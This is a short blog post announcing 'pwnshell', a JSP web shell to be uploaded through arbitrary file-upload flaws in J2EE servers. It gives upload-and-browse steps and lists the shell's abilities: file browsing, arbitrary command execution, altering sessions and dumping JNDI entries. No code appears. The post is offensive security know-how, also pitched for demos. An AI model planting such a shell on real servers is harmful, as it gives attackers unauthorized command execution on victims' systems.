If you’ve got arbitrary file uploads to a J2EE web accessible directory, you need something to maximize your compromise. The world needs a JSP shell that really helps a blackbox attacker pivot to important assets, so I took a stab at it. It’s called quite lamely called pwnshell. It’s a single JSP that, when browsed to, delivers the user a Web 2.0 shell for the victimized server. Great for demos! The shell is here.

How do you use it?
1. Upload it to the victim server (try it on a local Tomcat server!)
2. Browse to it
3. Pretend you’re on looking at xterm

Where does it work?
– Works across platform
– Works on Java 1.5+ (probably 1.4 too, but I haven’t tested)

Why would you use it?
– Browse around the system (as the web application system user)
– Execute arbitrary system commands (it’s a shell, after all)
– Show and alter session variables
– Dump JNDI entries

Here are some screenshots of the shell in action. The first one shows simple directory browsing. Notice all those directory links are clickable! This makes for a weird Explorer-like interface.

pwnshell - showing ls output

The next screenshot shows the help screen (type ‘help’) and the execution of a system command, ‘netstat’:

The last screenshot shows the shell’s autocomplete functionality.

Here’s a video: